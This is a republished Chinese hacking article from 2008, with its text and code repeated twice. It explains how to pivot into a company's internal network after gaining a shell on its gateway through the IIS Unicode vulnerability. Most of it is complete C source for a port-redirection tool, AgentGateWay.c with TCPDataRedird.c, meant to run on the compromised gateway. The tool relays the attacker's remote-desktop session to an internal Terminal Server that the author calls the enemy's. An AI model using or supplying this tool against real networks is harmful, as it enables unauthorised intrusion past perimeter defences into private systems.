| 導購 | 订阅 | 在线投稿
分享
 
 
 

從源程序看原理:突破防火牆入侵內網

2008-06-01 02:07:16  編輯來源:互聯網  简体版  手機版  移動版  評論  字體: ||

現在很多企業或者公司基本上網方式基本上都是申請一條連接到Internet的線路,寬帶、DDN、ADSL、ISDN等等,然後用一台服務器做網關,服務器兩塊網卡,一塊是連接到Internet,另一塊是連接到內網的HUB或者交換機,然後內網的其他機器就可以通過網關連接到Internet。

也許有些人會這樣想,我在內網之中,我們之間沒有直接的連接,你沒有辦法攻擊我。事實並非如此,在內網的機器同樣可能遭受到來自Internet的攻擊,當然前提是攻擊者已經取得網關服務器的某些權限,呵呵,這是不是廢話?其實,Internet上很多做網關的服務器並未經過嚴格的安全配置,要獲取權限也不是想象中的那麽難。

Ok!廢話就不說了,切入正題。我們的目標是用我們的TermClient[M$終端服務客戶端]連接到敵人內網的TermServer機器。M$的終端服務是一個很好的遠程治理工具,不是嗎?呵呵。沒有做非凡說明的話,文中提到的服務器OS都爲windows 2000。服務器爲Linux或其他的話,原理也差不多,把程序稍微修改就行了。

第一部分:利用TCP socket數據轉發進入沒有防火牆保護的內網

假設敵人網絡拓撲如下圖所示,沒有安裝防火牆或在網關服務器上做TCP/IP限制。

我們的目標是連接上敵人內網的Terminal

Server[192.168.1.3],因爲沒有辦法直接和他建立連接,那麽只有先從它的網關服務器上下手了。假如敵人網關服務器是M$的windows 2k,IIS有Unicode漏洞[現在要找些有漏洞的機器太輕易了,但我只是scripts kid,只會利用現成的漏洞做些簡單的攻擊:(555),那麽我們就得到一個網關的shell了,我們可以在那上面運行我們的程序,雖然權限很低,但也可以做很多事情了。Ok!讓我們來寫一個做TCP socket數據轉發的小程序,讓敵人的網關服務器忠實的爲我[202.1.1.1]和敵人內網的TermServer[192.168.1.3]之間轉發數據。題外話:實際入侵過程是先取得網關服務器的權限,然後用他做跳板,進一步摸清它的內部網絡拓撲結構,再做進一步的入侵,現在敵人的網絡拓撲是我們給他設計的,哈哈。

攻擊流程如下:

<1>在網關服務器202.2.2.2運行我們的程序AgentGateWay,他監聽TCP 3389端口[改成別的,那我們就要相應的修改TermClient了]等待我們去連接。

<2>我們202.1.1.1用TermClient連接到202.2.2.2:3389。

<3>202.2.2.2.接受202.1.1.1的連接,然後再建立一個TCP socket連接到自己內網的TermServer[192.168.1.3]

<4>這樣我們和敵人內網的TermServer之間的數據通道就建好了,接下來網關就忠實的爲我們轉發數據啦。當我們連接到202.2.2.2:3389的時候,其實出來的界面是敵人內網的192.168.1.3,感覺怎麽樣?:)

程序代碼如下:

/*

Module Name:AgentGateWay.c

CopyRight(c) eyas

說明:端口重定向工具,在網關上運行,把端口重定向到內網的IP、PORT,

就可以進入內網了

sock[0]==>sClient sock[1]==>sTarget

*/

#include

#include

#include "TCPDataRedird.c"

#define TargetIP TEXT("192.168.1.3")

#define TargetPort (int)3389

#define ListenPort (int)3389//監聽端口

#pragma comment(lib,"ws2_32.lib")

int main()

{

WSADATA wsd;

SOCKET sListen=INVALID_SOCKET,//本機監聽的socket

sock[2];

strUCt sockaddr_in Local,Client,Target;

int iAddrSize;

HANDLE hThreadC2T=NULL,//C2T=ClientToTarget

hThreadT2C=NULL;//T2C=TargetToClient

DWord dwThreadID;

__try

{

if(WSAStartup(MAKEWORD(2,2),&wsd)!=0)

{

printf("\nWSAStartup() failed:%d",GetLastError());

__leave;

}

sListen=socket(AF_INET,SOCK_STREAM,IPPROTO_IP);

if(sListen==INVALID_SOCKET)

{

printf("\nsocket() failed:%d",GetLastError());

__leave;

}

Local.sin_addr.s_addr=htonl(INADDR_ANY);

Local.sin_family=AF_INET;

Local.sin_port=htons(ListenPort);

Target.sin_family=AF_INET;

Target.sin_addr.s_addr=inet_addr(TargetIP);

Target.sin_port=htons(TargetPort);

if(bind(sListen,(struct sockaddr

*)&Local,sizeof(Local))==SOCKET_ERROR)

{

printf("\nbind() failed:%d",GetLastError());

__leave;

}

if(listen(sListen,1)==SOCKET_ERROR)

{

printf("\nlisten() failed:%d",GetLastError());

__leave;

}

//scoket循環

while(1)

{

printf("\n\n*************Waiting Client Connect

to**************\n\n");

iAddrSize=sizeof(Client);

//get socket sClient

sock[0]=accept(sListen,(struct sockaddr *)&Client,&iAddrSize);

if(sock[0]==INVALID_SOCKET)

{

printf("\naccept() failed:%d",GetLastError());

break;

}

printf("\nAccept client==>%s:%d",inet_ntoa(Client.sin_addr),

ntohs(Client.sin_port));

//create socket sTarget

sock[1]=socket(AF_INET,SOCK_STREAM,IPPROTO_IP);

if(sock[1]==INVALID_SOCKET)

{

printf("\nsocket() failed:%d",GetLastError());

__leave;

}

//connect to target port

if(connect(sock[1],(struct sockaddr

*)&Target,sizeof(Target))==SOCKET_ERROR)

{

printf("\nconnect() failed:%d",GetLastError());

__leave;

}

printf("\nconnect to target 3389 success!");

//創建兩個線程進行數據轉發

hThreadC2T=CreateThread(NULL,0,TCPDataC2T,(LPVOID)sock,0,&dwThreadID);

hThreadT2C=CreateThread(NULL,0,TCPDataT2C,(LPVOID)sock,0,&dwThreadID);

//等待兩個線程結束

WaitForSingleObject(hThreadC2T,INFINITE);

WaitForSingleObject(hThreadT2C,INFINITE);

CloseHandle(hThreadC2T);

CloseHandle(hThreadT2C);

closesocket(sock[1]);

closesocket(sock[0]);

printf("\n\n*****************Connection

Close*******************\n\n");

}//end of sock外循環

}//end of try

__finally

{

if(sListen!=INVALID_SOCKET) closesocket(sListen);

if(sock[0]!=INVALID_SOCKET) closesocket(sock[0]);

if(sock[1]!=INVALID_SOCKET) closesocket(sock[1]);

if(hThreadC2T!=NULL) CloseHandle(hThreadC2T);

if(hThreadT2C!=NULL) CloseHandle(hThreadT2C);

WSACleanup();

}

return 0;

}

/******

Module:TCPDataRedird.c

CopyRight(c) eyas

HomePage:www.patching.net

Thanks to shotgun

說明:TCP socket數據轉發,sock[0]==>sClient sock[1]==>sTarget

********/

#define BuffSize 20*1024 //緩沖區大小20k

//此函數負責從Client讀取數據,然後轉發給Target

DWORD WINAPI TCPDataC2T(SOCKET* sock)

{

int iRet,

ret=-1,//select 返回值

iLeft,

idx,

iSTTBCS=0;//STTBCS=SendToTargetBuffCurrentSize

char szSendToTargetBuff[BuffSize]=,

szRecvFromClientBuff[BuffSize]=;

fd_set fdread,fdwrite;

printf("\n\n*****************Connection

Active*******************\n\n");

while(1)

{

FD_ZERO(&fdread);

FD_ZERO(&fdwrite);

FD_SET(sock[0],&fdread);

FD_SET(sock[1],&fdwrite);

if((ret=select(0,&fdread,&fdwrite,NULL,NULL))==SOCKET_ERROR)

{

printf("\nselect() failed:%d",GetLastError());

break;

}

//printf("\nselect() return value ret=%d",ret);

if(ret>0)

{

//sClinet可讀,client有數據要發送過來

if(FD_ISSET(sock[0],&fdread))

{

//接收sock[0]發送來的數據

iRet=recv(sock[0],szRecvFromClientBuff,BuffSize,0);

if(iRet==SOCKET_ERROR)

{

printf("\nrecv() from sock[0] failed:%d",GetLastError());

break;

}

else if(iRet==0)

break;

printf("\nrecv %d bytes from sClinet.",iRet);

//把從client接收到的數據存添加到發往target的緩沖區

memcpy(szSendToTargetBuff+iSTTBCS,szRecvFromClientBuff,iRet);

//刷新發往target的數據緩沖區當前buff大小

iSTTBCS+=iRet;

//清空接收client數據的緩沖區

memset(szRecvFromClientBuff,0,BuffSize);

}

//sTarget可寫,把從client接收到的數據發送到target

if(FD_ISSET(sock[1],&fdwrite))

{

//轉發數據到target的3389端口

iLeft=iSTTBCS;

idx=0;

while(iLeft>0)

{

iRet=send(sock[1],&szSendToTargetBuff[idx],iLeft,0);

if(iRet==SOCKET_ERROR)

{

printf("\nsend() to target failed:%d",GetLastError());

break;

}

printf("\nsend %d bytes to target",iRet);

iLeft-=iRet;

idx+=iRet;

}

//清空緩沖區

memset(szSendToTargetBuff,0,BuffSize);

//重置發往target的數據緩沖區當前buff大小

iSTTBCS=0;

}

}//end of select ret

Sleep(1);

}//end of data send & recv循環

return 0;

}

//此函數負責從target讀取數據,然後發送給client

DWORD WINAPI TCPDataT2C(SOCKET* sock)

{

int iRet,

ret=-1,//select 返回值

iLeft,

idx,

iSTCBCS=0;//STCBCS=SendToClientBuffCurrentSize

char szRecvFromTargetBuff[BuffSize]=,

szSendToClientBuff[BuffSize]=;

fd_set fdread,fdwrite;

while(1)

{

FD_ZERO(&fdread);

FD_ZERO(&fdwrite);

FD_SET(sock[0],&fdwrite);

FD_SET(sock[1],&fdread);

if((ret=select(0,&fdread,&fdwrite,NULL,NULL))==SOCKET_ERROR)

{

printf("\nselect() failed:%d",GetLastError());

break;

}

if(ret>0)

{

//sTarget可讀,從target接收數據

if(FD_ISSET(sock[1],&fdread))

{

//接收target返回數據

iRet=recv(sock[1],szRecvFromTargetBuff,BuffSize,0);

if(iRet==SOCKET_ERROR)

{

printf("\nrecv() from target failed:%d",GetLastError());

break;

}

else if(iRet==0)

break;

printf("\nrecv %d bytes from target",iRet);

//把從target接收到的數據添加到發送到client的緩沖區

memcpy(szSendToClientBuff+iSTCBCS,szRecvFromTargetBuff,iRet);

//清空接收target返回數據緩沖區

memset(szRecvFromTargetBuff,0,BuffSize);

//刷新發送到client的數據緩沖區當前大小

iSTCBCS+=iRet;

}

//client可寫,發送target返回數據到client

if(FD_ISSET(sock[0],&fdwrite))

{

//發送target返回數據到client

iLeft=iSTCBCS;

idx=0;

while(iLeft>0)

{

iRet=send(sock[0],&szSendToClientBuff[idx],iLeft,0);

if(iRet==SOCKET_ERROR)

{

printf("\nsend() to Client failed:%d",GetLastError());

break;

}

printf("\nsend %d bytes to Client",iRet);

iLeft-=iRet;

idx+=iRet;

}

//清空緩沖區

memset(szSendToClientBuff,0,BuffSize);

iSTCBCS=0;

}

}//end of select ret

Sleep(1);

}//end of while

return 0;

}

  現在很多企業或者公司基本上網方式基本上都是申請一條連接到Internet的線路,寬帶、DDN、ADSL、ISDN等等,然後用一台服務器做網關,服務器兩塊網卡,一塊是連接到Internet,另一塊是連接到內網的HUB或者交換機,然後內網的其他機器就可以通過網關連接到Internet。 也許有些人會這樣想,我在內網之中,我們之間沒有直接的連接,你沒有辦法攻擊我。事實並非如此,在內網的機器同樣可能遭受到來自Internet的攻擊,當然前提是攻擊者已經取得網關服務器的某些權限,呵呵,這是不是廢話?其實,Internet上很多做網關的服務器並未經過嚴格的安全配置,要獲取權限也不是想象中的那麽難。   Ok!廢話就不說了,切入正題。我們的目標是用我們的TermClient[M$終端服務客戶端]連接到敵人內網的TermServer機器。M$的終端服務是一個很好的遠程治理工具,不是嗎?呵呵。沒有做非凡說明的話,文中提到的服務器OS都爲windows 2000。服務器爲Linux或其他的話,原理也差不多,把程序稍微修改就行了。   第一部分:利用TCP socket數據轉發進入沒有防火牆保護的內網   假設敵人網絡拓撲如下圖所示,沒有安裝防火牆或在網關服務器上做TCP/IP限制。   我們的目標是連接上敵人內網的Terminal   Server[192.168.1.3],因爲沒有辦法直接和他建立連接,那麽只有先從它的網關服務器上下手了。假如敵人網關服務器是M$的windows 2k,IIS有Unicode漏洞[現在要找些有漏洞的機器太輕易了,但我只是scripts kid,只會利用現成的漏洞做些簡單的攻擊:(555),那麽我們就得到一個網關的shell了,我們可以在那上面運行我們的程序,雖然權限很低,但也可以做很多事情了。Ok!讓我們來寫一個做TCP socket數據轉發的小程序,讓敵人的網關服務器忠實的爲我[202.1.1.1]和敵人內網的TermServer[192.168.1.3]之間轉發數據。題外話:實際入侵過程是先取得網關服務器的權限,然後用他做跳板,進一步摸清它的內部網絡拓撲結構,再做進一步的入侵,現在敵人的網絡拓撲是我們給他設計的,哈哈。   攻擊流程如下:   <1>在網關服務器202.2.2.2運行我們的程序AgentGateWay,他監聽TCP 3389端口[改成別的,那我們就要相應的修改TermClient了]等待我們去連接。   <2>我們202.1.1.1用TermClient連接到202.2.2.2:3389。   <3>202.2.2.2.接受202.1.1.1的連接,然後再建立一個TCP socket連接到自己內網的TermServer[192.168.1.3]   <4>這樣我們和敵人內網的TermServer之間的數據通道就建好了,接下來網關就忠實的爲我們轉發數據啦。當我們連接到202.2.2.2:3389的時候,其實出來的界面是敵人內網的192.168.1.3,感覺怎麽樣?:)   程序代碼如下: /* Module Name:AgentGateWay.c CopyRight(c) eyas 說明:端口重定向工具,在網關上運行,把端口重定向到內網的IP、PORT, 就可以進入內網了 sock[0]==>sClient sock[1]==>sTarget */ #include #include #include "TCPDataRedird.c" #define TargetIP TEXT("192.168.1.3") #define TargetPort (int)3389 #define ListenPort (int)3389//監聽端口 #pragma comment(lib,"ws2_32.lib") int main() { WSADATA wsd; SOCKET sListen=INVALID_SOCKET,//本機監聽的socket sock[2]; strUCt sockaddr_in Local,Client,Target; int iAddrSize; HANDLE hThreadC2T=NULL,//C2T=ClientToTarget hThreadT2C=NULL;//T2C=TargetToClient DWord dwThreadID; __try { if(WSAStartup(MAKEWORD(2,2),&wsd)!=0) { printf("\nWSAStartup() failed:%d",GetLastError()); __leave; } sListen=socket(AF_INET,SOCK_STREAM,IPPROTO_IP); if(sListen==INVALID_SOCKET) { printf("\nsocket() failed:%d",GetLastError()); __leave; } Local.sin_addr.s_addr=htonl(INADDR_ANY); Local.sin_family=AF_INET; Local.sin_port=htons(ListenPort); Target.sin_family=AF_INET; Target.sin_addr.s_addr=inet_addr(TargetIP); Target.sin_port=htons(TargetPort); if(bind(sListen,(struct sockaddr *)&Local,sizeof(Local))==SOCKET_ERROR) { printf("\nbind() failed:%d",GetLastError()); __leave; } if(listen(sListen,1)==SOCKET_ERROR) { printf("\nlisten() failed:%d",GetLastError()); __leave; } //scoket循環 while(1) { printf("\n\n*************Waiting Client Connect to**************\n\n"); iAddrSize=sizeof(Client); //get socket sClient sock[0]=accept(sListen,(struct sockaddr *)&Client,&iAddrSize); if(sock[0]==INVALID_SOCKET) { printf("\naccept() failed:%d",GetLastError()); break; } printf("\nAccept client==>%s:%d",inet_ntoa(Client.sin_addr), ntohs(Client.sin_port)); //create socket sTarget sock[1]=socket(AF_INET,SOCK_STREAM,IPPROTO_IP); if(sock[1]==INVALID_SOCKET) { printf("\nsocket() failed:%d",GetLastError()); __leave; } //connect to target port if(connect(sock[1],(struct sockaddr *)&Target,sizeof(Target))==SOCKET_ERROR) { printf("\nconnect() failed:%d",GetLastError()); __leave; } printf("\nconnect to target 3389 success!"); //創建兩個線程進行數據轉發 hThreadC2T=CreateThread(NULL,0,TCPDataC2T,(LPVOID)sock,0,&dwThreadID); hThreadT2C=CreateThread(NULL,0,TCPDataT2C,(LPVOID)sock,0,&dwThreadID); //等待兩個線程結束 WaitForSingleObject(hThreadC2T,INFINITE); WaitForSingleObject(hThreadT2C,INFINITE); CloseHandle(hThreadC2T); CloseHandle(hThreadT2C); closesocket(sock[1]); closesocket(sock[0]); printf("\n\n*****************Connection Close*******************\n\n"); }//end of sock外循環 }//end of try __finally { if(sListen!=INVALID_SOCKET) closesocket(sListen); if(sock[0]!=INVALID_SOCKET) closesocket(sock[0]); if(sock[1]!=INVALID_SOCKET) closesocket(sock[1]); if(hThreadC2T!=NULL) CloseHandle(hThreadC2T); if(hThreadT2C!=NULL) CloseHandle(hThreadT2C); WSACleanup(); } return 0; } /****** Module:TCPDataRedird.c CopyRight(c) eyas HomePage:www.patching.net Thanks to shotgun 說明:TCP socket數據轉發,sock[0]==>sClient sock[1]==>sTarget ********/ #define BuffSize 20*1024 //緩沖區大小20k //此函數負責從Client讀取數據,然後轉發給Target DWORD WINAPI TCPDataC2T(SOCKET* sock) { int iRet, ret=-1,//select 返回值 iLeft, idx, iSTTBCS=0;//STTBCS=SendToTargetBuffCurrentSize char szSendToTargetBuff[BuffSize]=, szRecvFromClientBuff[BuffSize]=; fd_set fdread,fdwrite; printf("\n\n*****************Connection Active*******************\n\n"); while(1) { FD_ZERO(&fdread); FD_ZERO(&fdwrite); FD_SET(sock[0],&fdread); FD_SET(sock[1],&fdwrite); if((ret=select(0,&fdread,&fdwrite,NULL,NULL))==SOCKET_ERROR) { printf("\nselect() failed:%d",GetLastError()); break; } //printf("\nselect() return value ret=%d",ret); if(ret>0) { //sClinet可讀,client有數據要發送過來 if(FD_ISSET(sock[0],&fdread)) { //接收sock[0]發送來的數據 iRet=recv(sock[0],szRecvFromClientBuff,BuffSize,0); if(iRet==SOCKET_ERROR) { printf("\nrecv() from sock[0] failed:%d",GetLastError()); break; } else if(iRet==0) break; printf("\nrecv %d bytes from sClinet.",iRet); //把從client接收到的數據存添加到發往target的緩沖區 memcpy(szSendToTargetBuff+iSTTBCS,szRecvFromClientBuff,iRet); //刷新發往target的數據緩沖區當前buff大小 iSTTBCS+=iRet; //清空接收client數據的緩沖區 memset(szRecvFromClientBuff,0,BuffSize); } //sTarget可寫,把從client接收到的數據發送到target if(FD_ISSET(sock[1],&fdwrite)) { //轉發數據到target的3389端口 iLeft=iSTTBCS; idx=0; while(iLeft>0) { iRet=send(sock[1],&szSendToTargetBuff[idx],iLeft,0); if(iRet==SOCKET_ERROR) { printf("\nsend() to target failed:%d",GetLastError()); break; } printf("\nsend %d bytes to target",iRet); iLeft-=iRet; idx+=iRet; } //清空緩沖區 memset(szSendToTargetBuff,0,BuffSize); //重置發往target的數據緩沖區當前buff大小 iSTTBCS=0; } }//end of select ret Sleep(1); }//end of data send & recv循環 return 0; } //此函數負責從target讀取數據,然後發送給client DWORD WINAPI TCPDataT2C(SOCKET* sock) { int iRet, ret=-1,//select 返回值 iLeft, idx, iSTCBCS=0;//STCBCS=SendToClientBuffCurrentSize char szRecvFromTargetBuff[BuffSize]=, szSendToClientBuff[BuffSize]=; fd_set fdread,fdwrite; while(1) { FD_ZERO(&fdread); FD_ZERO(&fdwrite); FD_SET(sock[0],&fdwrite); FD_SET(sock[1],&fdread); if((ret=select(0,&fdread,&fdwrite,NULL,NULL))==SOCKET_ERROR) { printf("\nselect() failed:%d",GetLastError()); break; } if(ret>0) { //sTarget可讀,從target接收數據 if(FD_ISSET(sock[1],&fdread)) { //接收target返回數據 iRet=recv(sock[1],szRecvFromTargetBuff,BuffSize,0); if(iRet==SOCKET_ERROR) { printf("\nrecv() from target failed:%d",GetLastError()); break; } else if(iRet==0) break; printf("\nrecv %d bytes from target",iRet); //把從target接收到的數據添加到發送到client的緩沖區 memcpy(szSendToClientBuff+iSTCBCS,szRecvFromTargetBuff,iRet); //清空接收target返回數據緩沖區 memset(szRecvFromTargetBuff,0,BuffSize); //刷新發送到client的數據緩沖區當前大小 iSTCBCS+=iRet; } //client可寫,發送target返回數據到client if(FD_ISSET(sock[0],&fdwrite)) { //發送target返回數據到client iLeft=iSTCBCS; idx=0; while(iLeft>0) { iRet=send(sock[0],&szSendToClientBuff[idx],iLeft,0); if(iRet==SOCKET_ERROR) { printf("\nsend() to Client failed:%d",GetLastError()); break; } printf("\nsend %d bytes to Client",iRet); iLeft-=iRet; idx+=iRet; } //清空緩沖區 memset(szSendToClientBuff,0,BuffSize); iSTCBCS=0; } }//end of select ret Sleep(1); }//end of while return 0; }
󰈣󰈤
王朝萬家燈火計劃
期待原創作者加盟
 
 
 
>>返回首頁<<
 
 
 
 
 熱帖排行
 
王朝網路微信公眾號
微信掃碼關註本站公眾號 wangchaonetcn
 
 
靜靜地坐在廢墟上,四周的荒凉一望無際,忽然覺得,淒涼也很美
© 2005- 王朝網路 版權所有